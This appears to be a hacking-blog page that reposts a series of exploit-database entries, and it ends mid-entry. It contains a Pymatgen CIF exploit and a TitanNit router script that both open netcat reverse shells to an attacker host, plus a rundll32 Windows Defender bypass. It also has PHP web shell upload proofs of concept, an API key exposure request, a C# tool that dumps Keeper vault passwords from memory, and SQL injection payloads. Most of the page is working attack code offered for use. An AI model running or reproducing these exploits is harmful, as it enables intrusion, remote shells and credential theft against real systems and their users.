# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https ://pymatgen.org
# Software Link : https ://pypi.org /project /pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346
import os
# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
# Constructing the malicious CIF file with reverse shell payload
malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date 2024-11-13
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
"""
# Save to a file
with open("vuln.cif", "w") as file:
file.write(malicious_cif)
print("[*] Malicious CIF file created: vuln.cif")
# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
ip = input("Enter your IP address for the reverse shell: ")
port = input("Enter the port for the reverse shell to listen on: ")
# Create the malicious CIF file
create_malicious_cif(ip, port)
# Trigger the Pymatgen CIF parser to parse the malicious file
from pymatgen.io.cif import CifParser
parser = CifParser("vuln.cif")
structure = parser.parse_structures()
# Running the exploit
if __name__ == "__main__":
exploit()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863114909
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution
#
#
# Vendor: AAF Digital HD Forum | Atelmo GmbH
# Product web page: http://www.aaf-digital.info | https://www.atemio.de
# Affected version: Firmware <=2.01
#
# Summary: The Atemio AM 520 HD Full HD satellite receiver enables the
# reception of digital satellite programs in overwhelming image quality
# in both SD and HD ranges. In addition to numerous connections, the small
# all-rounder offers a variety of plugins that can be easily installed
# thanks to the large flash memory. The TitanNit Linux software used combines
# the advantages of the existing E2 and Neutrino systems and is therefore
# fast, stable and adaptable.
#
# Desc: The vulnerability in the device enables an unauthorized attacker
# to execute system commands with elevated privileges. This exploit is
# facilitated through the use of the 'getcommand' query within the application,
# allowing the attacker to gain root access.
#
# ========================================================================
# _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999
# [*] Starting callback listener child thread
# [*] Listening on port 9999
# [*] Generating callback payload
# [*] Calling
# [*] Callback waiting: 3s
# [*] ('192.168.1.13', 40943) called back
# [*] Rootshell session opened
# sh: cannot set terminal process group (1134): Inappropriate ioctl for device
# sh: no job control in this shell
# sh-5.1# id
# <-sh-5.1# id
# uid=0(root) gid=0(root)
# sh-5.1# cat /etc/shadow | grep root
# <-sh-5.1# cat /etc/shadow | grep root
# root:$6$TAdBGj2mY***:18729:0:99999:7:::
# sh-5.1# exit
# [*] OK, bye!
#
# _#
# =======================================================================
#
# Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics)
# GNU/Linux 3.14-1.17 (armv7l)
# GNU/Linux 3.14.2 (mips)
# ATEMIO M46506 revision 990
# Atemio 7600 HD STB
# CPU STx7105 Mboard
# titan web server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5801
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
#
#
# 16.11.2023
#
from time import sleep
import threading
import requests
import socket
import sys
class RemoteControl:
def __init__(self):
self.timeout = 10
self.target = None
self.callback = None
self.cstop = threading.Event()
self.path = "/query?getcommand=&cmd="
self.lport = None
self.cmd = None
def beacon(self):
self.cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc "
self.cmd += self.callback + " "
self.cmd += str(self.lport) + " "
self.cmd += ">/tmp/j"
self.path += self.cmd
r = requests.get(self.target + self.path)
def slusaj(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
s.listen(1)
print("[*] Listening on port " + str(self.lport))
sleep(1)
try:
conn, addr = s.accept()
print("\n[*]", addr, "called back")
print("[*] Rootshell session opened")
self.cstop.set()
except socket.timeout:
print("[-] Call return timeout\n[!] Check your ports")
conn.close()
while True:
try:
odg = conn.recv(999999).decode()
sys.stdout.write(odg)
command = input()
command += "\n"
if "exit" in command:
exit(-17)
conn.send(command.encode())
sleep(0.5)
sys.stdout.write("<-" + odg.split("\n")[-1])
except:
print("[*] OK, bye!")
exit(-1)
s.close()
def tajmer(self):
for z in range(self.timeout, 0, -1):
poraka = f"[*] Callback waiting: {z}s"
print(poraka, end='', flush=True)
sys.stdout.flush()
sleep(1)
if self.cstop.is_set():
break
print(' ' * len(poraka), end='\r')
if not self.cstop.is_set():
print("[-] Call return timeout\n[!] Check your ports")
exit(0)
else:
print(end=' ')
def thricer(self):
print("[*] Starting callback listener child thread")
plet1 = threading.Thread(name="ZSL", target=self.slusaj)
plet1.start()
sleep(1)
print("[*] Generating callback payload")
sleep(1)
print("[*] Calling")
plet2 = threading.Thread(name="ZSL", target=self.tajmer)
plet2.start()
self.beacon()
plet1.join()
plet2.join()
def howto(self):
if len(sys.argv) != 4:
self.usage()
else:
self.target = sys.argv[1]
self.callback = sys.argv[2]
self.lport = int(sys.argv[3])
if not self.target.startswith("http"):
self.target = "http://{}".format(self.target)
def dostabesemolk(self):
naslov = """
o===--------------------------------------===o
| |
| TitanNit Web Control Remote Code Execution |
| ZSL-2023-5801 |
| |
o===--------------------------------------===o
||
||
||
||
||
||
||
||
L!
/_)
/ /L
_______________________/ (__)
_______________________ (__)
\_(__)
||
||
||
||
||
||
"""
print(naslov)
def usage(self):
self.dostabesemolk()
print("Usage: ./titan.py <target ip> <listen ip> <listen port>")
print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999")
exit(0)
def main(self):
self.howto()
self.thricer()
if __name__ == '__main__':
RemoteControl().main()
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows Defender
[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
TrojanWin32Powessere.G
[CVE Reference]
N/A
[Security Issue]
Trojan.Win32/Powessere.G / Mitigation Bypass Part 2.
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will typically get an "Access is denied" error message.
Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.
However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing.
[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
[Exploit/POC]
Open command prompt as Administator.
C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
Access is denied.
C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
Multi-commas, for the Win!
[Network Access]
Local
[Severity]
High
[Disclosure Timeline]
February 7, 2024: Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://phpgurukul.com>
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187
===============================
STEPS_TO_REPRODUCE
===============================
1. Login into Teacher-Account with the credentials “Username: jogoe12@yourdomain.com”
Password: Test@123”
2. Navigate to Profile Section and edit the Profile Pic by clicking on Edit Image
3. Open the Burp-suite and Intercept the Edit Image Request
4. In POST Request Change the “ Filename “ from “ profile picture.png “ to “profile picture.php.gif ”
5. Change the **Content-type from “ image/png “ to “ image/gif “
6. And Add this **Payload** : `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. Where **GIF89a is the GIF magic bytes this bypass the file upload extension**
8. Below is the Burpsuite-POST Request for all the changes that I have made above
==========================================
BURPSUITE_REQUEST
==========================================
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: <http://localhost>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <http://localhost/trms/teacher/changeimage.php>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"
John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif
GIF89a <?php echo system($_REQUEST['dx']); ?>
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"
------WebKitFormBoundaryndAPYa0GGOxSUHdF--
===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
# Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure
# Date: 2025-04-08
# Exploit Author: Seth Kraft, Alex Tisdale
# Vendor Homepage: https://www.nagios.com/
# Vendor Changelog: https://www.nagios.com/changelog/#log-server
# Software Link: https://www.nagios.com/products/log-server/download/
# Version: Nagios Log Server 2024R1.3.1 and below
# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04)
# CWE: CWE-200, CWE-284, CWE-522
# CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
# Type: Information Disclosure, Improper Access Control
# Exploit Risk: Critical
## Disclosure
For ethical research purposes only. Do not target systems without proper authorization.
## Description
An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens.
## PoC
### Step 1: Access the vulnerable endpoint
```
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"
```
## Sample Response
```json
[
{
"name": "devadmin",
"username": "devadmin",
"email": "test@example.com",
"apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
"auth_type": "admin",
...
}
]
```
#!/usr/bin/env python3
# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)
# Date: 09/04/2023
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip
# Version: 1.0
# Tested on: Debian 11.6
# CVE : CVE-2023-1826
# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.
import requests
from argparse import ArgumentParser
from uuid import uuid4
from datetime import datetime, timezone
def interactiveShell(fileUrl: str):
print("Entering pseudo-shell. Type 'exit' to quit")
while True:
command = input("\n$ ")
if command == "exit":
break
response = requests.get(f"{fileUrl}?cmd={command}")
print(response.text)
def uploadFile(url: str, filename: str, content):
endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"
file = {"img": (filename, content)}
response = requests.post(endpoint, files=file)
return response
def getUploadedFileUrl(url: str, filename: str):
timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes
epoch = int(timeNow.timestamp()) # Time in milliseconds
possibleFilename = f"{epoch}_{filename}"
fileUrl = f"{url}/uploads/{possibleFilename}"
response = requests.get(fileUrl)
if response.status_code == 200:
return fileUrl
def exploit(url: str):
filename = str(uuid4()) + ".php"
content = "<?php system($_GET['cmd'])?>"
response = uploadFile(url, filename, content)
if response.status_code != 200:
print(f"[File Upload] Got status code {response.status_code}. Expected 200.")
uploadedUrl = getUploadedFileUrl(url, filename)
if uploadedUrl == None:
print("Error. Could not find the uploaded file.")
exit(1)
print(f"Uploaded file is at {uploadedUrl}")
try:
interactiveShell(uploadedUrl)
except KeyboardInterrupt:
pass
print("\nQuitting.")
def getWebsiteURL(url: str):
if not url.startswith("http"):
url = "http://" + url
if url.endswith("/"):
url = url[:-1]
return url
def main():
parser = ArgumentParser(description="Exploit for CVE-2023-1826")
parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")
args = parser.parse_args()
url = getWebsiteURL(args.url)
exploit(url)
if __name__ == "__main__":
main()
Exploit Title: Perch v3.2 - Remote Code Execution (RCE)
Application: Perch Cms
Version: v3.2
Bugs: RCE
Technology: PHP
Vendor URL: https://grabaperch.com/
Software Link: https://grabaperch.com/download
Date of found: 21.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. login to account as admin
2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)
3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)
4. upload poc.phar file
poc.phar file contents :
<?php $a=$_GET['code']; echo system($a);?>
5. visit http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwd
poc request:
POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1
Host: localhost
Content-Length: 1071
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9
Connection: close
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceTitle"
test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image"; filename="poc.phar"
Content-Type: application/octet-stream
<?php $a=$_GET['code']; echo system($a);?>
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_field"
1
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="image_assetID"
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="resourceBucket"
admin
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="tags"
test
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="btnsubmit"
Submit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="formaction"
edit
------WebKitFormBoundaryYGoerZn09hHSjd4Z
Content-Disposition: form-data; name="token"
5494af3e8dbe5ac399ca7f12219cfe82
------WebKitFormBoundaryYGoerZn09hHSjd4Z--
# Exploit Title: Keeper Security desktop 16.10.2 & Browser Extension 16.5.4 - Password Dumping
# Google Dork: NA
# Date: 22-07-2023
# Exploit Author: H4rk3nz0
# Vendor Homepage: https://www.keepersecurity.com/en_GB/
# Software Link: https://www.keepersecurity.com/en_GB/get-keeper.html
# Version: Desktop App version 16.10.2 & Browser Extension version 16.5.4
# Tested on: Windows
# CVE : CVE-2023-36266
using System;
using System.Management;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Text.RegularExpressions;
using System.Collections.Generic;
// Keeper Security Password vault Desktop application and Browser Extension stores credentials in plain text in memory
// This can persist after logout if the user has not explicitly enabled the option to 'clear process memory'
// As a result of this one can extract credentials & master password from a victim after achieving low priv access
// This does NOT target or extract credentials from the affected browser extension (yet), only the Windows desktop app.
// Github: https://github.com/H4rk3nz0/Peeper
static class Program
{
// To make sure we are targetting the right child process - check command line
public static string GetCommandLine(this Process process)
{
if (process is null || process.Id < 1)
{
return "";
}
string query = $@"SELECT CommandLine FROM Win32_Process WHERE ProcessId = {process.Id}";
using (var searcher = new ManagementObjectSearcher(query))
using (var collection = searcher.Get())
{
var managementObject = collection.OfType<ManagementObject>().FirstOrDefault();
return managementObject != null ? (string)managementObject["CommandLine"] : "";
}
}
//Extract plain text credential JSON strings (regex inelegant but fast)
public static void extract_credentials(string text)
{
int index = text.IndexOf("{\"title\":\"");
int eindex = text.IndexOf("}");
while (index >= 0)
{
try
{
int endIndex = Math.Min(index + eindex, text.Length);
Regex reg = new Regex("(\\{\\\"title\\\"[ -~]+\\}(?=\\s))");
string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
int match_cut = match.IndexOf("} ");
if (match_cut != -1 )
{
match = match.Substring(0, match_cut + "} ".Length).TrimEnd();
if (!stringsList.Contains(match) && match.Length > 20)
{
Console.WriteLine("->Credential Record Found : " + match.Substring(0, match_cut + "} ".Length) + "\n");
stringsList.Add(match);
}
} else if (!stringsList.Contains(match.TrimEnd()) && match.Length > 20)
{
Console.WriteLine("->Credential Record Found : " + match + "\n");
stringsList.Add(match.TrimEnd());
}
index = text.IndexOf("{\"title\":\"", index + 1);
eindex = text.IndexOf("}", eindex + 1);
}
catch
{
return;
}
}
}
// extract account/email containing JSON string
public static void extract_account(string text)
{
int index = text.IndexOf("{\"expiry\"");
int eindex = text.IndexOf("}");
while (index >= 0)
{
try
{
int endIndex = Math.Min(index + eindex, text.Length);
Regex reg = new Regex("(\\{\\\"expiry\\\"[ -~]+@[ -~]+(?=\\}).)");
string match = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
if ((match.Length > 2))
{
Console.WriteLine("->Account Record Found : " + match + "\n");
return;
}
index = text.IndexOf("{\"expiry\"", index + 1);
eindex = text.IndexOf("}", eindex + 1);
}
catch
{
return;
}
}
}
// Master password not available with SSO based logins but worth looking for.
// Disregard other data key entries that seem to match: _not_master_key_example
public static void extract_master(string text)
{
int index = text.IndexOf("data_key");
int eindex = index + 64;
while (index >= 0)
{
try
{
int endIndex = Math.Min(index + eindex, text.Length);
Regex reg = new Regex("(data_key[ -~]+)");
var match_one = reg.Match(text.Substring(index - 1, endIndex - index)).ToString();
Regex clean = new Regex("(_[a-zA-z]{1,14}_[a-zA-Z]{1,10})");
if (match_one.Replace("data_key", "").Length > 5)
{
if (!clean.IsMatch(match_one.Replace("data_key", "")))
{
Console.WriteLine("->Master Password : " + match_one.Replace("data_key", "") + "\n");
}
}
index = text.IndexOf("data_key", index + 1);
eindex = index + 64;
}
catch
{
return;
}
}
}
// Store extracted strings and comapre
public static List<string> stringsList = new List<string>();
// Main function, iterates over private committed memory pages, reads memory and performs regex against the pages UTF-8
// Performs OpenProcess to get handle with necessary query permissions
static void Main(string[] args)
{
foreach (var process in Process.GetProcessesByName("keeperpasswordmanager"))
{
string commandline = GetCommandLine(process);
if (commandline.Contains("--renderer-client-id=5") || commandline.Contains("--renderer-client-id=7"))
{
Console.WriteLine("->Keeper Target PID Found: {0}", process.Id.ToString());
Console.WriteLine("->Searching...\n");
IntPtr processHandle = OpenProcess(0x00000400 | 0x00000010, false, process.Id);
IntPtr address = new IntPtr(0x10000000000);
MEMORY_BASIC_INFORMATION memInfo = new MEMORY_BASIC_INFORMATION();
while (VirtualQueryEx(processHandle, address, out memInfo, (uint)Marshal.SizeOf(memInfo)) != 0)
{
if (memInfo.State == 0x00001000 && memInfo.Type == 0x20000)
{
byte[] buffer = new byte[(int)memInfo.RegionSize];
if (NtReadVirtualMemory(processHandle, memInfo.BaseAddress, buffer, (uint)memInfo.RegionSize, IntPtr.Zero) == 0x0)
{
string text = Encoding.ASCII.GetString(buffer);
extract_credentials(text);
extract_master(text);
extract_account(text);
}
}
address = new IntPtr(memInfo.BaseAddress.ToInt64() + memInfo.RegionSize.ToInt64());
}
CloseHandle(processHandle);
}
}
}
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll")]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("ntdll.dll")]
public static extern uint NtReadVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, byte[] Buffer, UInt32 NumberOfBytesToRead, IntPtr NumberOfBytesRead);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern int VirtualQueryEx(IntPtr hProcess, IntPtr lpAddress, out MEMORY_BASIC_INFORMATION lpBuffer, uint dwLength);
[StructLayout(LayoutKind.Sequential)]
public struct MEMORY_BASIC_INFORMATION
{
public IntPtr BaseAddress;
public IntPtr AllocationBase;
public uint AllocationProtect;
public IntPtr RegionSize;
public uint State;
public uint Protect;
public uint Type;
}
}
# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)
# Date: 09/07/2023
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c
# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643
# Version: 4.0
# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
## Example 1
-----------------------------------------------------------------------------------------------------------------------
Param: name, email, comment
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/news-details.php?nid=13 HTTP/1.1
Origin: http://127.0.0.1
Sec-Fetch-User: ?1
Host: 127.0.0.1:80
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
sec-ch-ua-mobile: ?0
Content-Length: 277
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-platform: "Windows"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Fetch-Dest: document
csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 10:55:26 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146161
<script>alert('comment successfully submit. Comment will be display after admin review ');</script>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="">
<meta name="author" content="">
<title>News Portal | Home Page
[...]
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
POST /newsportal/news-details.php?nid=13 HTTP/1.1
Origin: http://127.0.0.1
Sec-Fetch-User: ?1
Host: 127.0.0.1:80
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
sec-ch-ua-mobile: ?0
Content-Length: 276
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Connection: close
Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-platform: "Windows"
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Sec-Fetch-Dest: document
csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 09 Jul 2023 10:56:06 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
X-Powered-By: PHP/8.1.17
Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 525
Connection: close
Content-Type: text/html; charset=UTF-8
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21
Stack trace:
#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')
#1 {main}
thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w
-----------------------------------------------------------------------------------------------------------------------
SQLMap example param 'comment':
-----------------------------------------------------------------------------------------------------------------------
sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:
---
Parameter: #2* ((custom) POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
